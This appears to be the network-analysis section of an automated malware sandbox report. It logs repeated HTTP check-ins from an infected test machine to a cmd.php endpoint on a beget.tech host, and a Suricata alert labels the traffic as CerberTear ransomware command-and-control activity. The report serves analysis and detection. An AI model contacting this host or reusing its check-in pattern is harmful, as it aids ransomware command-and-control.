Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
mrmax4td.beget.tech | 91.106.207.89 | |
GET 200 http://mrmax4td.beget.tech/cmd.php?hwid=7C6024AD

Request:
GET /cmd.php?hwid=7C6024AD HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: mrmax4td.beget.tech
Connection: Keep-Alive

Response:
HTTP/1.1 200 OK
Server: nginx-reuseport/1.21.1
Date: Wed, 21 Dec 2022 01:11:34 GMT
Content-Type: text/html
Content-Length: 3
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
GET 200 http://mrmax4td.beget.tech/cmd.php?timeout=1

Request:
GET /cmd.php?timeout=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: mrmax4td.beget.tech

Response:
HTTP/1.1 200 OK
Server: nginx-reuseport/1.21.1
Date: Wed, 21 Dec 2022 01:11:34 GMT
Content-Type: text/html
Content-Length: 4
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
GET 200 http://mrmax4td.beget.tech/cmd.php?hwid=7C6024AD

Request:
GET /cmd.php?hwid=7C6024AD HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: mrmax4td.beget.tech

Response:
HTTP/1.1 200 OK
Server: nginx-reuseport/1.21.1
Date: Wed, 21 Dec 2022 01:12:34 GMT
Content-Type: text/html
Content-Length: 3
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
GET 200 http://mrmax4td.beget.tech/cmd.php?timeout=1

Request:
GET /cmd.php?timeout=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: mrmax4td.beget.tech

Response:
HTTP/1.1 200 OK
Server: nginx-reuseport/1.21.1
Date: Wed, 21 Dec 2022 01:12:34 GMT
Content-Type: text/html
Content-Length: 4
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49166 -> 91.106.207.89:80 | 2023505 | ET MALWARE CerberTear Ransomware CnC Checkin | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts